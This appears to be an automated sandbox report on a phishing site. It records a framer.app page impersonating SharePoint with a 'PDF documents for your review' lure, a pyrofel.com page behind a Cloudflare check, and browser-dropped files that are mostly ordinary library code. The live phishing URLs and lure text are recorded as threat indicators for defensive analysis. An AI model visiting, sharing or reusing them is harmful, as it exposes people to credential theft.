          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:21
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • EGA enabled
          Analysis Mode:stream
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal56.phis.win@20/28@40/202

          Warnings

          • Exclude process from analysis (whitelisted): TextInputHost.exe
          • Excluded IPs from analysis (whitelisted): 142.250.186.163, 142.251.173.84, 142.250.185.174, 34.104.35.123
          • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com
          • Not all processes where analyzed, report is missing behavior information

          LLM Input / Output

          InputOutput
          URL: https://magical-variation-300980.framer.app/ Model: jbxai
          {
"brand":["SharePoint"],
"contains_trigger_text":true,
"trigger_text":"YOU HAVE RECEIVED (2)-PDF DOCUMENTS FOR YOUR REVIEW",
"prominent_button_name":"Preview Documents",
"text_input_field_labels":"unknown",
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"has_visible_qrcode":false}
          URL: https://magical-variation-300980.framer.app/ Model: jbxai
          {
"brand":["SharePoint"],
"contains_trigger_text":true,
"trigger_text":"YOU HAVE RECEIVED (2)-PDF DOCUMENTS FOR YOUR REVIEW",
"prominent_button_name":"Preview Documents",
"text_input_field_labels":"unknown",
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"has_visible_qrcode":false}
          URL: https://pyrofel.com/contractE2400/online-management/direct/auth/proposedebook.html Model: jbxai
          {
"brand":["CLOUDFLARE"],
"contains_trigger_text":true,
"trigger_text":"Verifying...",
"prominent_button_name":"unknown",
"text_input_field_labels":"unknown",
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"has_visible_qrcode":false}

          Created / dropped Files

          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 10:53:40 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
          Category:dropped
          Size (bytes):2677
          Entropy (8bit):3.9957699315523096
          Encrypted:false
          SSDEEP:
          MD5:1AA6058B4694FAE5A1B27B799EFA9129
          SHA1:E9F553EFE1271C36EECCDC62EEC53D0AD9E0C17B
          SHA-256:CC74BBA74EA0EF67CF9DD975D74BD52F5BE23F115D3E8163409EE05A495ED893
          SHA-512:3E0D60220580644CC278B317FBB0BAD099F34269E0B2AC6530B996D5E049E6F88BC168B28A61531C6750C7780C0BA52004EC04FC779C51DF2EB90A7E323D894A
          Malicious:false
          Reputation:unknown
          Preview:L..................F.@.. ...$+.,......rd/.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I>Y.^....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>Y.^....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V>Y.^....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V>Y.^...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V>Y.^...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........]..S.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 10:53:40 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
          Category:dropped
          Size (bytes):2679
          Entropy (8bit):4.012178962541126
          Encrypted:false
          SSDEEP:
          MD5:1D3C71F96090CC027D87A0D0BAB249D6
          SHA1:5A833E49DA4005BF6512F19F80A91C18877DC5EA
          SHA-256:C0DEF65733770F2B7096E26B818786436888AD579A4841903893494E45E20EC8
          SHA-512:44B1C7F935FB8D60528295FC32CAF04C1D3AE899A7A050EDC05D2D641A93E60E449B2E485CA7F464CB0B89C131E5FCBAA55DA216AD1B33967F8826C6D654D625
          Malicious:false
          Reputation:unknown
          Preview:L..................F.@.. ...$+.,.....{fd/.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I>Y.^....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>Y.^....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V>Y.^....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V>Y.^...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V>Y.^...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........]..S.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
          Category:dropped
          Size (bytes):2693
          Entropy (8bit):4.023070160230072
          Encrypted:false
          SSDEEP:
          MD5:B0499C366DD6A7C3D5171AEAB8BABCC1
          SHA1:28B07E114D0E43381492879B5D4E04877BCE4A76
          SHA-256:0C2DE1D3C995002EB4F6BF01C948367E8A952A37DDB2CBF8DF8639761AED6019
          SHA-512:6EC185002F7BBEFE064EC8ACC62C9E0D7366900D69266BC270C6FD1F87670F9EC5CE3E6431519F06D41940834ECC4A21BF8D678263CA9DAB4AF86A5DA01495A0
          Malicious:false
          Reputation:unknown
          Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I>Y.^....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>Y.^....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V>Y.^....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V>Y.^...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........]..S.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 10:53:40 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
          Category:dropped
          Size (bytes):2681
          Entropy (8bit):4.010481919465156
          Encrypted:false
          SSDEEP:
          MD5:4B414467F94BEAD51D8B40EE9510633F
          SHA1:B29B5F764AFCD71F142F61D41F87B6540AB29DD1
          SHA-256:9B5D8526609D15973AC61C1FCDBF10DAFBBE9B2EF1E6E391FD057AD8DB85D031
          SHA-512:4D3087A1012E4522B2F87D55D16DEC6A0A52FCBF42F990708D1E3254817D32C07A54B89EF9F064507AC3F69133BF0C684E8D8840FE429B2F3BDF092FA57A6CEC
          Malicious:false
          Reputation:unknown
          Preview:L..................F.@.. ...$+.,.....(_d/.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I>Y.^....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>Y.^....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V>Y.^....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V>Y.^...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V>Y.^...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........]..S.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 10:53:40 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
          Category:dropped
          Size (bytes):2681
          Entropy (8bit):3.9980465278486315
          Encrypted:false
          SSDEEP:
          MD5:F5AACB057017515A643E214138A60262
          SHA1:22447C7DD2BFC2C1C26EE3D987253B2F95D1DCC4
          SHA-256:02A5DC6F10F74B93002EB7247499D5C1BB886B47E7E4E1A66E62FC4E7A3D478A
          SHA-512:02D50D9597B872C2456D7893674A3A42E98894DD9ECA85D59D7EBE1FA4180DDB1171F33192A44A64644924A1DC9A3AB993D2A5BB64D4A97AA661A3C62F6EF062
          Malicious:false
          Reputation:unknown
          Preview:L..................F.@.. ...$+.,....f.ld/.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I>Y.^....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>Y.^....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V>Y.^....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V>Y.^...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V>Y.^...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........]..S.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 10:53:40 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
          Category:dropped
          Size (bytes):2683
          Entropy (8bit):4.01188272316662
          Encrypted:false
          SSDEEP:
          MD5:2F8E759ACD84B24D27F862D9403512B9
          SHA1:6A2394935B1FD0DCC37D2521DC97BC31404F31E4
          SHA-256:41B92E7E4698C78A165C22AA956C4466128AD82CA0E75E23068AC336C1D511AA
          SHA-512:C8D6C150DA374D790733C3F7EE848FE8132F6A1E3E579C3ABE60CD1BD682D85C7F0602ABBD98673B508B2B01D2B55979CAB0A5445B3F7E31A776D40C3C02BF7C
          Malicious:false
          Reputation:unknown
          Preview:L..................F.@.. ...$+.,......Qd/.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I>Y.^....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>Y.^....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V>Y.^....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V>Y.^...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V>Y.^...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........]..S.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

          Chrome Cache Entry: 100

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (47261)
          Category:dropped
          Size (bytes):47262
          Entropy (8bit):5.3974731018213795
          Encrypted:false
          SSDEEP:
          MD5:E07E7ED6F75A7D48B3DF3C153EB687EB
          SHA1:4601D83C67CC128D1E75D3E035FB8A3BDFA1EE34
          SHA-256:96BD1C81D59D6AC2EC9F8EBE4937A315E85443667C5728A7CD9053848DD8D3D7
          SHA-512:A0BAF8B8DF121DC9563C5C2E7B6EEE00923A1E684A6C57E3F2A4C73E0D6DD59D7E9952DF5E3CFFFB08195C8475B6ED261769AFB5581F4AB0C0A4CC342EC577C9
          Malicious:false
          Reputation:unknown
          Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS

          Chrome Cache Entry: 101

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (26554)
          Category:downloaded
          Size (bytes):26603
          Entropy (8bit):4.728450633304761
          Encrypted:false
          SSDEEP:
          MD5:21FA75A340820E752071732FE9099278
          SHA1:04EF56CA9E437A4F89021B010E8257A8CCA22287
          SHA-256:33270955952458046C95C6F42495AF1765196B82B6786283A123E6276A3B9146
          SHA-512:048D498B039E4982DE75BF4B2D7DE3FA16E8A9069EED0C62BA488745A11C81FE650E0568B55D3FCC4A62286ED42CCA1373B7F13FB32CFEF2BCB6854A7B525BCF
          Malicious:false
          Reputation:unknown
          URL:https://framerusercontent.com/sites/6YYuQ1FLDalWCuDrLyjZQj/PX9hIOIVM-XXV3XXZQ.mjs
          Preview:import"./chunk-42U43NKG.mjs";import{A as Z,D as T,G as _,H as I,J as N,N as R,Z as F,b as h,ba as g,da as D,e as w,h as v,j as b,l as y,m as M,o as a,p as V,q as f,r as d,s as k}from"./chunk-6YCP7OQD.mjs";import{c as l}from"./chunk-RIUMFBNJ.mjs";function H(t){return e=>a("a",{href:"https://www.framer.com",title:"Framer - Custom website builder for designers, agencies and startups.",children:a(t,{...e,onClick:o=>{var r,C;o.preventDefault(),l.open(`https://www.framer.com/r/badge/?utm_campaign=freeplanbadge&utm_source=${encodeURIComponent((C=l)===null||C===void 0||(r=C.location)===null||r===void 0?void 0:r.origin)}`)},style:{...e.style,cursor:"pointer"}})})}var j=H(d.div),X=["HK2sXlagE","AN4QiK4rL"],O="framer-TLVk2",B={AN4QiK4rL:"framer-v-17nhh09",HK2sXlagE:"framer-v-n0ccwk"};function x(t,...e){let o={};return e?.forEach(r=>r&&Object.assign(o,t[r])),o}var z={damping:60,delay:0,mass:1,stiffness:500,type:"spring"},G=(t,e)=>`translate(-50%, -50%) ${e}`,J=({value:t,children:e})=>{let o=v(f),r

          Chrome Cache Entry: 106

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 65 x 36, 8-bit/color RGB, non-interlaced
          Category:downloaded
          Size (bytes):61
          Entropy (8bit):4.002585360278504
          Encrypted:false
          SSDEEP:
          MD5:640B0420B36A943D846945DC8FE41C30
          SHA1:EE37E04A8254DD5F1244E52EE0D27864BE1DBBDA
          SHA-256:EF65390DE21DF8A0DB3C31AB1F7B18BD2C8884CD7F69C2217E08350A263CCD9B
          SHA-512:CA60AEB8A88E4EE165A6E35AA7ECBF0E3C8F3E286ED6D933280AE89523198E6AC8F9AF322AEB211F2031D9A773A081DA7EE6C31C8E7D03512EAFC41063C40027
          Malicious:false
          Reputation:unknown
          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8cb403f20c904268/1727697238523/6A4uLwacmp0uCnc
          Preview:.PNG........IHDR...A...$.....Y.......IDAT.....$.....IEND.B`.

          Chrome Cache Entry: 107

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (47992), with no line terminators
          Category:dropped
          Size (bytes):47992
          Entropy (8bit):5.605846858683577
          Encrypted:false
          SSDEEP:
          MD5:CF3402D7483B127DED4069D651EA4A22
          SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
          SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
          SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
          Malicious:false
          Reputation:unknown
          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null

          Chrome Cache Entry: 108

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (65447)
          Category:downloaded
          Size (bytes):89501
          Entropy (8bit):5.289893677458563
          Encrypted:false
          SSDEEP:
          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
          Malicious:false
          Reputation:unknown
          URL:https://code.jquery.com/jquery-3.6.0.min.js
          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

          Chrome Cache Entry: 109

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (36412), with CRLF, LF line terminators
          Category:downloaded
          Size (bytes):41230
          Entropy (8bit):5.024933597412232
          Encrypted:false
          SSDEEP:
          MD5:0E26FDC305D35964AABF8B1817CA86FA
          SHA1:0263CDCB4D5D8B004152F288980071B66853F730
          SHA-256:8A91D687030400AE9EA7FEF00B1D03B572073B0D92837A8EA7FFDE3BCF8AD4F9
          SHA-512:049540463A27CCD8070BD66ECED96E094A67840E0A88A7465E4E554EBCBCAA2CC88ACEB470F43A980D07A850B80479772AFF484432A97B78F37A2224342DB48A
          Malicious:false
          Reputation:unknown
          URL:https://magical-variation-300980.framer.app/
          Preview:<!doctype html>.. . Built with Framer . https://www.framer.com/ -->..<html>..<head>.. <meta charset="utf-8">.. .. .. Start of headStart -->.. .. End of headStart -->.. <meta name="viewport" content="width=1200">.. <meta name="generator" content="Framer 0b8b5e5">.. <title>My Framer Site</title>.. <meta name="description" content="Made with Framer">.. <meta name="framer-search-index" content="https://framerusercontent.com/sites/6YYuQ1FLDalWCuDrLyjZQj/searchIndex-aXjCZ_HS3Lrq.json">.. <link href="https://framerusercontent.com/sites/icons/default-favicon-light.v1.png" rel="icon" media="(prefers-color-scheme: light)">.. <link href="https://framerusercontent.com/sites/icons/default-favicon-dark.v1.png" rel="icon" media="(prefers-color-scheme: dark)">.. <link rel="apple-touch-icon" href="https://framerusercontent.com/sites/icons/default-touch-icon.v3.png">.. Open Graph / Facebook -->.. <meta property="og:type" content="web

          Chrome Cache Entry: 110

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (18088)
          Category:dropped
          Size (bytes):18089
          Entropy (8bit):5.178183231621744
          Encrypted:false
          SSDEEP:
          MD5:980FD56F4DE8C70875F97ECDADE4545D
          SHA1:86FA83F95B43167CBB587D441FC85C0BC2A2F346
          SHA-256:2E1A2AC17CDB96C3C75F3EE659733C110B73392955CC9523DFFDCF04254AAA63
          SHA-512:BBC83C50E352F9DE7FC758B2871F36A7721F0F39E28465A0CF36788FFFBCC0D3996582267593079C3FC9E8B2EB30710C151EB3A6CA37D8D44BA4F3832D1D2036
          Malicious:false
          Reputation:unknown
          Preview:"use strict";(()=>{var V,$,P=function(){var e=self.performance&&performance.getEntriesByType&&performance.getEntriesByType("navigation")[0];if(e&&e.responseStart>0&&e.responseStart<performance.now())return e},R=function(e){if(document.readyState==="loading")return"loading";var t=P();if(t){if(e<t.domInteractive)return"loading";if(t.domContentLoadedEventStart===0||e<t.domContentLoadedEventStart)return"dom-interactive";if(t.domComplete===0||e<t.domComplete)return"dom-content-loaded"}return"complete"},Ie=function(e){var t=e.nodeName;return e.nodeType===1?t.toLowerCase():t.toUpperCase().replace(/^#/,"")},G=function(e,t){var r="";try{for(;e&&e.nodeType!==9;){var a=e,i=a.id?"#"+a.id:Ie(a)+(a.classList&&a.classList.value&&a.classList.value.trim()&&a.classList.value.trim().length?"."+a.classList.value.trim().replace(/\s+/g,"."):"");if(r.length+i.length>(t||100)-1)return r||i;if(r=r?i+">"+r:i,a.id)break;e=a.parentNode}}catch{}return r},oe=-1,se=function(){return oe},M=function(e){addEventListene

          Chrome Cache Entry: 111

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:Java source, ASCII text, with very long lines (2926)
          Category:downloaded
          Size (bytes):2977
          Entropy (8bit):5.461526666930152
          Encrypted:false
          SSDEEP:
          MD5:EB7083B78A492F392363ACF02D44993D
          SHA1:F893C4592D05D5ECB6C6A345821D7B187B875B62
          SHA-256:F5028B27C6E94F7DE61F01D57FF65290E13563D13E2A19C6BE2881F856A59A99
          SHA-512:D16EC11BEDB8925C17A3F75BE8F05E1AF873BDE08DF74EA12C905B53B16D23087C93EF7658818AD7D789EE87B36CF8CE23C950EC479DEADFD70052EED7DD45B7
          Malicious:false
          Reputation:unknown
          URL:https://framerusercontent.com/sites/6YYuQ1FLDalWCuDrLyjZQj/script_main.V57BLPRN.mjs
          Preview:import{B as P,C as S,E as w,I as O,L as x,Q as D,R as M,Y as V,c as h,d as o,f as b,fa as B,g as l,t as v,u as _,v as f,w as F,x as E,y as k,z as I}from"./chunk-6YCP7OQD.mjs";import{c as t}from"./chunk-RIUMFBNJ.mjs";var W="default"in _?v:_,m={},H=W;m.createRoot=H.createRoot;m.hydrateRoot=H.hydrateRoot;var u=m.createRoot,N=m.hydrateRoot;var p={augiA20Il:{elements:{},page:f(()=>import("./dqa62RV-tPrLEha76eKIvRwZbVeC4htPQYBjwJWsq1I.4MC2Q4TL.mjs")),path:"/"}},z=[{code:"en-US",id:"default",name:"English",slug:""}];async function J({routeId:a,pathVariables:n,localeId:r}){await p[a].page.preload();let s=o(M,{isWebsite:!0,routeId:a,pathVariables:n,routes:p,collectionUtils:{},framerSiteId:"2c0050db49f8d7d6cbb7e438e721e7d271b1b5d43cdc8ae00ec4c1216b477676",notFoundPage:f(()=>import("./SitesNotFoundPage.js@1.1-AIYWDYOH.mjs")),isReducedMotion:void 0,localeId:r,locales:z,preserveQueryParams:void 0}),c=o(D,{children:s,value:{enableAsyncURLUpdates:!1,useGranularSuspense:!1}});return o(F,{children:c,va

          Chrome Cache Entry: 112

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (65536), with no line terminators
          Category:dropped
          Size (bytes):644661
          Entropy (8bit):5.364049568620206
          Encrypted:false
          SSDEEP:
          MD5:730680911E7B6D540EB70EC4FEE9DDD7
          SHA1:A89D47FA91D41F281C27DA9AEEF5743CD483912E
          SHA-256:972080B21CE0CAC823772E2E19CAA7E721742C6F4AD5EDC50241CADC51A06B1E
